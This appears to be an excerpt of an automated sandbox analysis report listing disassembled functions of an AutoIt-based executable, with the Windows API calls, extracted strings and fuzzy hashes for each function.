                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 73e029442c172ec833e3237daaa3a99f019494d539b9711260ba586e6fa6bb74
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 57C173322091B35ADF2D463A943453EBAA1BFA27B131B076DD4B3DB1D4EE10C9A5D720
                                                      Function 00821978 Relevance: .3, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 35bd88bce62c4b1c9f16d98c6b408087df70ab4c1f32d6e858b07ec27f47e969
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 34C184362451B349DF2D4639A47813EBAA1EEB27B132B076DD4B3CB1D4EE20C9A5D710
                                                      Function 00A40778 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 1dfe054331182be8e1126c112f0a80349dd7567a2537835fb503f45708bb491f
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: 0741B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                      Function 00877806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 0087785B
                                                      • DeleteObject.GDI32(00000000), ref: 0087786D
                                                      • DestroyWindow.USER32 ref: 0087787B
                                                      • GetDesktopWindow.USER32 ref: 00877895
                                                      • GetWindowRect.USER32(00000000), ref: 0087789C
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008779DD
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008779ED
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877A35
                                                      • GetClientRect.USER32(00000000,?), ref: 00877A41
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00877A7B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00877A9D
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877AB0
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877ABB
                                                      • GlobalLock.KERNEL32(00000000), ref: 00877AC4
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00877AD3
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00877ADC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00877AE3
                                                      • GlobalFree.KERNEL32(00000000), ref: 00877AEE
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00877B00
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00892CAC,00000000), ref: 00877B16
                                                      • GlobalFree.KERNEL32(00000000), ref: 00877B26
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00877B4C
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00877B6B
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00877B8D
                                                      • ShowWindow.USER32(00000004), ref: 00877D7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                      • Instruction ID: fe812de1bd21e56385c8ff6f504be847134bb8fc5f4aae791159a64445f9ea3b
                                                      • Opcode Fuzzy Hash: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                      • Instruction Fuzzy Hash: 1E023B71900115AFDB14DFA8DC89EAE7BB9FB48310F148169F919EB2A2D734ED41CB60
                                                      Function 0088356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00883627
                                                      • IsWindowVisible.USER32(?), ref: 0088364B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: 4ab248a4d64389c54247c4b29704d779dbfeadc88dca081b1189842375119453
                                                      • Instruction ID: 0b7f21cbc3ec835fd49521b7c480c926fdfad3b94b779cf6f21cf53914eee285
                                                      • Opcode Fuzzy Hash: 4ab248a4d64389c54247c4b29704d779dbfeadc88dca081b1189842375119453
                                                      • Instruction Fuzzy Hash: 47D15D702043119BCA04FF18C852A6E7BA5FF95754F544468F986DB3A3DB21EE4ACB42
                                                      Function 0088A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0088A630
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0088A661
                                                      • GetSysColor.USER32(0000000F), ref: 0088A66D
                                                      • SetBkColor.GDI32(?,000000FF), ref: 0088A687
                                                      • SelectObject.GDI32(?,00000000), ref: 0088A696
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A6C1
                                                      • GetSysColor.USER32(00000010), ref: 0088A6C9
                                                      • CreateSolidBrush.GDI32(00000000), ref: 0088A6D0
                                                      • FrameRect.USER32(?,?,00000000), ref: 0088A6DF
                                                      • DeleteObject.GDI32(00000000), ref: 0088A6E6
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0088A731
                                                      • FillRect.USER32(?,?,00000000), ref: 0088A763
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088A78E
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(00000012), ref: 0088A903
                                                        • Part of subcall function 0088A8CA: SetTextColor.GDI32(?,?), ref: 0088A907
                                                        • Part of subcall function 0088A8CA: GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(0000000F), ref: 0088A928
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(00000011), ref: 0088A945
                                                        • Part of subcall function 0088A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                        • Part of subcall function 0088A8CA: SelectObject.GDI32(?,00000000), ref: 0088A964
                                                        • Part of subcall function 0088A8CA: SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                        • Part of subcall function 0088A8CA: SelectObject.GDI32(?,?), ref: 0088A97A
                                                        • Part of subcall function 0088A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
                                                        • Part of subcall function 0088A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                        • Part of subcall function 0088A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                        • Part of subcall function 0088A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: bc35a8e575ecbb4779d9bd09c2d2b7fc8ebc193253c29af5d7576af0715afaa4
                                                      • Instruction ID: c1ee18d28b8a6b71f65fa963b9e5bcc2af3eb41904181bede64871c43b00d52f
                                                      • Opcode Fuzzy Hash: bc35a8e575ecbb4779d9bd09c2d2b7fc8ebc193253c29af5d7576af0715afaa4
                                                      • Instruction Fuzzy Hash: A7918E72008301EFD711AF68DC08A5B7BA9FF89321F104B2AF6A2D61E2D771D944CB52
                                                      Function 008774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 008774DE
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0087759D
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008775DB
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008775ED
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00877633
                                                      • GetClientRect.USER32(00000000,?), ref: 0087763F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00877683
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00877692
                                                      • GetStockObject.GDI32(00000011), ref: 008776A2
                                                      • SelectObject.GDI32(00000000,00000000), ref: 008776A6
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008776B6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 008776BF
                                                      • DeleteDC.GDI32(00000000), ref: 008776C8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008776F4
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0087770B
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00877746
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0087775A
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0087776B
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0087779B
                                                      • GetStockObject.GDI32(00000011), ref: 008777A6
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008777B1
                                                      • ShowWindow.USER32(00000004), ref: 008777BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 3fdb891182fcb0531bfcce28941335db5cf2803bb02b9d20fa3feb57103d8f4e
                                                      • Instruction ID: 1b79e9e970e6cc94fceeaa5e585a4d6460b6d533b12ed1752aee751f0882213c
                                                      • Opcode Fuzzy Hash: 3fdb891182fcb0531bfcce28941335db5cf2803bb02b9d20fa3feb57103d8f4e
                                                      • Instruction Fuzzy Hash: 38A12DB1A40615BFEB14DBA8DC4AFAA7BB9FB08710F108114FA15E72E1D774AD40CB64
                                                      Function 0086AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086AD1E
                                                      • GetDriveTypeW.KERNEL32(?,0088FAC0,?,\\.\,0088F910), ref: 0086ADFB
                                                      • SetErrorMode.KERNEL32(00000000,0088FAC0,?,\\.\,0088F910), ref: 0086AF59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 9aaab638523965a3d6e057f0084b5480e5e6eff11bba6c4dc4f8f324bdf3f73b
                                                      • Instruction ID: e12d67b6730968604b07f91ab927668be16ed016a2ca2935f0feff3142ee1bf6
                                                      • Opcode Fuzzy Hash: 9aaab638523965a3d6e057f0084b5480e5e6eff11bba6c4dc4f8f324bdf3f73b
                                                      • Instruction Fuzzy Hash: 78517BB0648209EACB08EB64D993CBDB7A8FF08714B228066E416F7391DE359D01DF53
                                                      Function 008068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 93646922f0f53432fc9ff9bdd44c05d26c9223fb38d36a09645a4fb6709858c3
                                                      • Instruction ID: a9f3f7470e10c0b110cd8f97c0571ae89c535ff20eaf2dc565222809edc5a015
                                                      • Opcode Fuzzy Hash: 93646922f0f53432fc9ff9bdd44c05d26c9223fb38d36a09645a4fb6709858c3
                                                      • Instruction Fuzzy Hash: 228104B0700219AEDF60BA64EC52FAB3768FF15710F040024FD05EA2D6FB64DA65C6A2
                                                      Function 00802C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32 ref: 00802CA2
                                                      • DeleteObject.GDI32(00000000), ref: 00802CE8
                                                      • DeleteObject.GDI32(00000000), ref: 00802CF3
                                                      • DestroyCursor.USER32(00000000), ref: 00802CFE
                                                      • DestroyWindow.USER32(00000000), ref: 00802D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0083C43B
                                                      • 69E6E349.COMCTL32(?,000000FF,?), ref: 0083C474
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0083C89D
                                                        • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00801B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 0083C8DA
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0083C8F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DestroyMessageSendWindow$DeleteObject$CursorE349InvalidateMoveRect
                                                      • String ID: 0
                                                      • API String ID: 2631842597-4108050209
                                                      • Opcode ID: bfb280ac2fda01ba93afc7c7aef25c98512753484c7306950d180831cd38e05e
                                                      • Instruction ID: 1ded665338ae546c850bc5b2df695159689712401515871b130840a348adb36d
                                                      • Opcode Fuzzy Hash: bfb280ac2fda01ba93afc7c7aef25c98512753484c7306950d180831cd38e05e
                                                      • Instruction Fuzzy Hash: 8C128D30600201EFEB65DF28C888BA9BBE5FF85314F544569F995EB2A2C771EC41CB91
                                                      Function 00889A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00889AD2
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00889B8B
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00889BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                      • Instruction ID: 68c1e9fbe155008b80dccfb0a92e753c3403312334f38d6bef118953b642449d
                                                      • Opcode Fuzzy Hash: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                      • Instruction Fuzzy Hash: 5302BF30104201AFE729EF18C849BBABBE5FF49314F08462DFAD9D62A1D775D944CB52
                                                      Function 0088A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0088A903
                                                      • SetTextColor.GDI32(?,?), ref: 0088A907
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                      • GetSysColor.USER32(0000000F), ref: 0088A928
                                                      • CreateSolidBrush.GDI32(?), ref: 0088A92D
                                                      • GetSysColor.USER32(00000011), ref: 0088A945
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                      • SelectObject.GDI32(?,00000000), ref: 0088A964
                                                      • SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                      • SelectObject.GDI32(?,?), ref: 0088A97A
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
